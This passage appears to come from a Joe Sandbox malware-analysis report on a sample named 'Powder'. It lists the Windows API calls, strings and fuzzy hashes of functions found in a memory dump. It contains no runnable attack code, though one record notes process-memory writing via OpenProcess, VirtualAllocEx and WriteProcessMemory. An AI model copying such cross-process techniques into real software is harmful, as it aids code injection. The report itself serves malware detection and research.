                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 6d79339f4720dfaf82430545532ecc3ef4c330b5b5425ab8b8cb1f0e1db97163
                                                  • Instruction ID: 9737cbc55bbe0084c377c7a5ceace9013d70d76d362243676e3b73decb29106a
                                                  • Opcode Fuzzy Hash: 6d79339f4720dfaf82430545532ecc3ef4c330b5b5425ab8b8cb1f0e1db97163
                                                  • Instruction Fuzzy Hash: 5611E9B29086186FC7418BAAAC04A9B7FACEB45360F540267F815F3261D67289488BE1
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58E3C
                                                  • GetLastError.KERNEL32(?,00E58900,?,?,?), ref: 00E58E46
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00E58900,?,?,?), ref: 00E58E55
                                                  • HeapAlloc.KERNEL32(00000000,?,00E58900,?,?,?), ref: 00E58E5C
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58E73
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 64838b59b887d1fc45dbdf2b6d4ef5e679fa3077aeae5e3a68291999db9eeca0
                                                  • Instruction ID: 2a9463424a718297606c0e6af65197aff0531c1940eccd7ba2c2bbb9574aadc7
                                                  • Opcode Fuzzy Hash: 64838b59b887d1fc45dbdf2b6d4ef5e679fa3077aeae5e3a68291999db9eeca0
                                                  • Instruction Fuzzy Hash: 5D011D71601204BFDB214FA6DD49D6B7BBDEF89755B50096AFC49E2220DF31DC18CA60
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E6581B
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65829
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65831
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E6583B
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65877
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: d236a29fdd00086b618bcdcf14cd9063a5e51b4c832acb60919ece58387dee2a
                                                  • Instruction ID: 473282c8c1620f6828359b9caa59dc8381b890793c658ae5953009063efbaac5
                                                  • Opcode Fuzzy Hash: d236a29fdd00086b618bcdcf14cd9063a5e51b4c832acb60919ece58387dee2a
                                                  • Instruction Fuzzy Hash: DC015732E42A199FCF089FEAE8499EDBFB8FB08751F40456AE501B3140CB309554CBA1
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E58CDE
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E58CE8
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58CF7
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58CFE
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E58D14
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 40bca9c9fd83bd62a595f0f945087a27bbb7a0605ae7c4add6b1c95219476956
                                                  • Instruction ID: 872be07cffddfca6f4d9ac3d502c3dfc6946cb6ac22fb9e814405b9035fc7314
                                                  • Opcode Fuzzy Hash: 40bca9c9fd83bd62a595f0f945087a27bbb7a0605ae7c4add6b1c95219476956
                                                  • Instruction Fuzzy Hash: C9F0AF31201204AFEF111FA69C89E6B3BACEF49759B904927F945E2190CA609C08DB60
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58D3F
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D49
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D58
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D5F
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D75
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 7447b2b6fb3dc135269bba754425631de8558aac506eaf843a1fe36ca90caf49
                                                  • Instruction ID: 8b180d01daae7f2bf803d5415998eb83b2c2672c2d8ac61f21be8466ddb9166d
                                                  • Opcode Fuzzy Hash: 7447b2b6fb3dc135269bba754425631de8558aac506eaf843a1fe36ca90caf49
                                                  • Instruction Fuzzy Hash: 54F0AF31201204AFEB110FA6EC88F6B3BACEF89759F840517F944E2190CB609D09DB60
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E5CD90
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5CDA7
                                                  • MessageBeep.USER32(00000000), ref: 00E5CDBF
                                                  • KillTimer.USER32(?,0000040A), ref: 00E5CDDB
                                                  • EndDialog.USER32(?,00000001), ref: 00E5CDF5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 5ac7e49e4809c82e47560973be4330b125a4cded9793ce9cbf340c558364ba3c
                                                  • Instruction ID: 5f7bba5fc13f54f21ba0cf8cfc9f2adbc31ee747a3c5a476d3ac61278c900e47
                                                  • Opcode Fuzzy Hash: 5ac7e49e4809c82e47560973be4330b125a4cded9793ce9cbf340c558364ba3c
                                                  • Instruction Fuzzy Hash: D1018B71500704AFEB215B51DD5EB967B78FB04706F501A6BF682B14D1DBF0A95C8B80
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00E0179B
                                                  • StrokeAndFillPath.GDI32(?,?,00E3BBC9,00000000,?), ref: 00E017B7
                                                  • SelectObject.GDI32(?,00000000), ref: 00E017CA
                                                  • DeleteObject.GDI32 ref: 00E017DD
                                                  • StrokePath.GDI32(?), ref: 00E017F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 8e7402c956e07bf3cc7f9664ebe02c8c89acac68e7a629ee045e527b3aca5287
                                                  • Instruction ID: 551c1b3f2b1c17140d6f3a4e280b8c2b740eb5651c2341eacd80a79ef1ee57bb
                                                  • Opcode Fuzzy Hash: 8e7402c956e07bf3cc7f9664ebe02c8c89acac68e7a629ee045e527b3aca5287
                                                  • Instruction Fuzzy Hash: 6EF03C32008258EFDB295F27EC4CB583FA4AB01326F488266F5A9781F0C732499ADF10
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00E6CA75
                                                  • CoCreateInstance.OLE32(00E93D3C,00000000,00000001,00E93BAC,?), ref: 00E6CA8D
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • CoUninitialize.OLE32 ref: 00E6CCFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 6455fafb15420285ea6f257562d903fcdcf69d48f36a3cf6c809200ba32e4695
                                                  • Instruction ID: 09f3e8316f2097f31e74adcbc962752284f9bb645bf8eede0ede277601eaf552
                                                  • Opcode Fuzzy Hash: 6455fafb15420285ea6f257562d903fcdcf69d48f36a3cf6c809200ba32e4695
                                                  • Instruction Fuzzy Hash: 0AA15CB1104205AFD304EF64D881EAFB7E8EF94344F00595DF695A72D2EB70EA49CB92
                                                  APIs
                                                    • Part of subcall function 00E20FE6: std::exception::exception.LIBCMT ref: 00E2101C
                                                    • Part of subcall function 00E20FE6: __CxxThrowException@8.LIBCMT ref: 00E21031
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E11680: _memmove.LIBCMT ref: 00E116DB
                                                  • __swprintf.LIBCMT ref: 00E0E598
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E0E431
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: 2e77e9183e6b1885e9b4596865b00acf430b99d225c125904069cab90b4aeafa
                                                  • Instruction ID: 9ef78ae2536ba8f78ba0703386f6fe8dbaa03738cdb006ab9369fd4c8d75283f
                                                  • Opcode Fuzzy Hash: 2e77e9183e6b1885e9b4596865b00acf430b99d225c125904069cab90b4aeafa
                                                  • Instruction Fuzzy Hash: 48918E721042019FC714EF24D895CAEB7E4EF95304F00296DF591B72E2EA30EE84CB92
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00E252CD
                                                    • Part of subcall function 00E30320: __87except.LIBCMT ref: 00E3035B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: c5d3cc09e9a68a8eeeefaec344ab979fb64204ecddf7b58f1f4ae0faa44ea297
                                                  • Instruction ID: 68448d0aad9a16d4d7f379a57359e4a4b931b287392fd97828174ab8b5bed22f
                                                  • Opcode Fuzzy Hash: c5d3cc09e9a68a8eeeefaec344ab979fb64204ecddf7b58f1f4ae0faa44ea297
                                                  • Instruction Fuzzy Hash: 86518B33909601DACB15A714EB253BA6FE49B01754F307C69E0E1B62F9EE748DC8DA42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: a71a0b6f1766d5eb127d76fdd25b7e34ef3b1cd44bdad3696f37a4f8666ff5d6
                                                  • Instruction ID: eddcd462ab003b23b3ea87cf53e15bc5d17d326bfcbd9e7be86cf1531e666bdc
                                                  • Opcode Fuzzy Hash: a71a0b6f1766d5eb127d76fdd25b7e34ef3b1cd44bdad3696f37a4f8666ff5d6
                                                  • Instruction Fuzzy Hash: 9B513475500255CFDF19EF28D440AFA7BA0EF59324F582456EC81BB2D1C730AC8ACB60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_free
                                                  • String ID: #V
                                                  • API String ID: 2620147621-3658881132
                                                  • Opcode ID: 3d0a504f45c2530edb033344ca7202aaa1ee5a530a0d0a226ec7aca14ed51e15
                                                  • Instruction ID: a2b96b521819c3b7531ba3065d0093b7e904a5d071811e5b7f3e4eec315101ad
                                                  • Opcode Fuzzy Hash: 3d0a504f45c2530edb033344ca7202aaa1ee5a530a0d0a226ec7aca14ed51e15
                                                  • Instruction Fuzzy Hash: C75159716083418FDB24CF28D481B2EBBE5FF89314F04592DE599A73A1E731E841CB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: b1ec8f313ee93cc461104ab44c06d668669ca087adef318f9f9d11380af3c53f
                                                  • Instruction ID: d63ce9a0d090e75cc8115c615283e4c83c9fd4e5969371c695e2f6b298cbd549
                                                  • Opcode Fuzzy Hash: b1ec8f313ee93cc461104ab44c06d668669ca087adef318f9f9d11380af3c53f
                                                  • Instruction Fuzzy Hash: 1F51C1B19043099BDB24CF64C881BEABBF5EF48314F24956EE84AEB241E770D6C5CB50
                                                  APIs
                                                    • Part of subcall function 00E61CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59E4E,?,?,00000034,00000800,?,00000034), ref: 00E61CE5
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E5A3F7
                                                    • Part of subcall function 00E61C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00E61CB0
                                                    • Part of subcall function 00E61BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00E61C08
                                                    • Part of subcall function 00E61BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E59E12,00000034,?,?,00001004,00000000,00000000), ref: 00E61C18
                                                    • Part of subcall function 00E61BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E59E12,00000034,?,?,00001004,00000000,00000000), ref: 00E61C2E
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E5A464
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E5A4B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: de8367e4b65857973c295ba3684ce788cb4a80d00b4b4c3a34d763f9731097a6
                                                  • Instruction ID: fe529f1ac5b07140c95ad84f17c46497a850f5485dd71f17b7a9803edce0a468
                                                  • Opcode Fuzzy Hash: de8367e4b65857973c295ba3684ce788cb4a80d00b4b4c3a34d763f9731097a6
                                                  • Instruction Fuzzy Hash: 0D418E7294021CBFCB11DFA4CC85ADEBBB8EF09340F0441A5FA55B7180DA706E89CBA1
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87A86
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E87A9A
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E87ABE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 2cf3e6a587996b351073e564438b5b7298bb1d88595b52b4109bd30bd5366a53
                                                  • Instruction ID: 3e95096be3e4ab264d22ef67b273ca38270098df575087decaa71cec1d9d7d58
                                                  • Opcode Fuzzy Hash: 2cf3e6a587996b351073e564438b5b7298bb1d88595b52b4109bd30bd5366a53
                                                  • Instruction Fuzzy Hash: 6821EF32200218BFDF159F50CC82FEE3BA9EF48724F211254FE587B190DAB1E8549BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E8826F
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E8827D
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E88284
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: 3a707b436a17d19b7a5517dd0f66bcd5e44d9ee48effeb81f7334b80f8b84cf3
                                                  • Instruction ID: b0a4d01d8a954270ac194f4b20f1ef27f38f83cfb41876621af12b34dfba46e0
                                                  • Opcode Fuzzy Hash: 3a707b436a17d19b7a5517dd0f66bcd5e44d9ee48effeb81f7334b80f8b84cf3
                                                  • Instruction Fuzzy Hash: A42190B1604219AFDB10EF64DC85DA737EDEB4A358B441059FE09BB2A1CB71EC11CBA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E87360
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E87370
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E87395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
